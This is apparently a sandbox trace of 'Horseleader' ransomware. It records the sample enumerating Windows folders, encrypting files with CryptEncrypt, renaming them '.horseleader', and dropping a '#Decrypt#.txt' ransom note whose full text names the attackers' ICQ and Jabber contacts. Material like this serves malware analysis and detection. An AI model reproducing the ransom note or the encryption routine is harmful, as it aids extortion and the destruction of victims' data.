GetProcessHeap () returned 0x780000 [0234.326] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0234.326] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69dc9750, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="MSClientDataMgr", cAlternateFileName="MSCLIE~1")) returned 1 [0234.326] lstrcmpiW (lpString1="MSClientDataMgr", lpString2="Windows") returned -1 [0234.326] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr") returned 66 [0234.326] lstrcmpW (lpString1="MSClientDataMgr", lpString2=".") returned 1 [0234.326] lstrcmpW (lpString1="MSClientDataMgr", lpString2="..") returned 1 [0234.326] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.326] GetProcessHeap () returned 0x780000 [0234.326] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0234.326] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\*") returned 68 [0234.326] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69dc9750, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, 
ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0234.327] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.327] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\.") returned 68 [0234.327] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.327] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69dc9750, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0234.328] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.328] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\..") returned 69 [0234.328] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.328] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.328] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad59fd00, ftCreationTime.dwHighDateTime=0x1ca9454, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xad59fd00, ftLastWriteTime.dwHighDateTime=0x1ca9454, nFileSizeHigh=0x0, nFileSizeLow=0x665a0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSCDM.DLL", cAlternateFileName="")) returned 1 [0234.328] lstrcmpiW (lpString1="MSCDM.DLL", lpString2="Windows") 
returned -1 [0234.328] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 76 [0234.328] StrStrIW (lpFirst="MSCDM.DLL", lpSrch=".horseleader") returned 0x0 [0234.328] lstrcmpW (lpString1="MSCDM.DLL", lpString2="#Decrypt#.txt") returned 1 [0234.328] lstrcmpW (lpString1="MSCDM.DLL", lpString2="_uninstalling_.png") returned 1 [0234.328] lstrlenW (lpString=".testttjffg") returned 11 [0234.328] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL", lpSrch=".testttjffg") returned 0x0 [0234.328] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.328] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.328] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\msclientdatamgr\\mscdm.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.329] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 76 [0234.329] StrStrW (lpFirst="MSCDM.DLL", lpSrch=".txt") returned 0x0 [0234.329] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=419232) returned 1 [0234.329] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.329] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, 
lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0234.355] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0234.356] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0234.356] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x30ad0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.356] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0234.417] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0234.417] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0234.418] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x615a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.418] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0234.452] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0234.452] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, 
lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0234.452] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.452] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0234.452] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0234.453] CloseHandle (hObject=0x158) returned 1 [0234.453] GetProcessHeap () returned 0x780000 [0234.453] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0234.453] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL.horseleader") returned 88 [0234.453] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\msclientdatamgr\\mscdm.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\msclientdatamgr\\mscdm.dll.horseleader")) returned 1 [0234.454] GetProcessHeap () returned 0x780000 [0234.454] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.454] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad59fd00, ftCreationTime.dwHighDateTime=0x1ca9454, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, 
ftLastWriteTime.dwLowDateTime=0xad59fd00, ftLastWriteTime.dwHighDateTime=0x1ca9454, nFileSizeHigh=0x0, nFileSizeLow=0x665a0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSCDM.DLL", cAlternateFileName="")) returned 0 [0234.454] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0234.455] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\#Decrypt#.txt") returned 80 [0234.455] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\msclientdatamgr\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0234.455] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0234.455] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0234.456] lstrlenA (lpString="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") returned 1368 [0234.456] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0234.456] CloseHandle (hObject=0x21c) returned 1 [0234.457] GetProcessHeap () returned 0x780000 [0234.457] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0234.457] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="MSInfo", cAlternateFileName="")) returned 1 [0234.457] lstrcmpiW (lpString1="MSInfo", lpString2="Windows") returned -1 [0234.457] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo") returned 57 [0234.457] lstrcmpW (lpString1="MSInfo", lpString2=".") returned 1 [0234.457] lstrcmpW (lpString1="MSInfo", lpString2="..") returned 1 [0234.457] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.457] GetProcessHeap () returned 0x780000 [0234.457] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7d9fd8 [0234.457] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\*") returned 59 [0234.457] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0234.457] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.457] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\.") returned 59 [0234.457] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.457] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0234.458] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.458] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\..") returned 60 [0234.458] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.458] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.458] 
FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="en-US", cAlternateFileName="")) returned 1 [0234.458] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0234.458] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US") returned 63 [0234.458] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0234.458] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0234.458] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.458] GetProcessHeap () returned 0x780000 [0234.458] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0234.458] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\*") returned 65 [0234.458] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.458] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0234.458] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\.") returned 65 [0234.458] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.458] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName="..", cAlternateFileName="")) returned 1 [0234.458] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.458] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\..") returned 66 [0234.459] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.459] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.459] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0a09f, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xccb91a1, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xca0a09f, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x6800, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName="msinfo32.exe.mui", cAlternateFileName="")) returned 1 [0234.459] lstrcmpiW (lpString1="msinfo32.exe.mui", lpString2="Windows") returned -1 [0234.459] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 
80 [0234.459] StrStrIW (lpFirst="msinfo32.exe.mui", lpSrch=".horseleader") returned 0x0 [0234.459] lstrcmpW (lpString1="msinfo32.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0234.459] lstrcmpW (lpString1="msinfo32.exe.mui", lpString2="_uninstalling_.png") returned 1 [0234.459] lstrlenW (lpString=".testttjffg") returned 11 [0234.459] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui", lpSrch=".testttjffg") returned 0x0 [0234.459] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.459] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.459] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.460] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0a09f, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xccb91a1, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xca0a09f, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x6800, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName="msinfo32.exe.mui", cAlternateFileName="")) returned 0 [0234.460] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.460] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\#Decrypt#.txt") returned 
77 [0234.460] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.465] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0234.465] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.466] lstrlenA (lpString="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") returned 1368 [0234.466] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.466] CloseHandle (hObject=0x158) returned 1 [0234.466] GetProcessHeap () returned 0x780000 [0234.466] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.466] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x830a4e7c, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x830a4e7c, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x830cafdd, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5c800, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msinfo32.exe", cAlternateFileName="")) returned 1 [0234.466] lstrcmpiW (lpString1="msinfo32.exe", lpString2="Windows") returned -1 [0234.466] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 70 [0234.466] StrStrIW (lpFirst="msinfo32.exe", lpSrch=".horseleader") returned 0x0 [0234.467] lstrcmpW (lpString1="msinfo32.exe", lpString2="#Decrypt#.txt") returned 1 [0234.467] lstrcmpW (lpString1="msinfo32.exe", lpString2="_uninstalling_.png") returned 1 [0234.467] lstrlenW (lpString=".testttjffg") returned 11 [0234.467] StrStrW (lpFirst="\\\\?\\C:\\Program 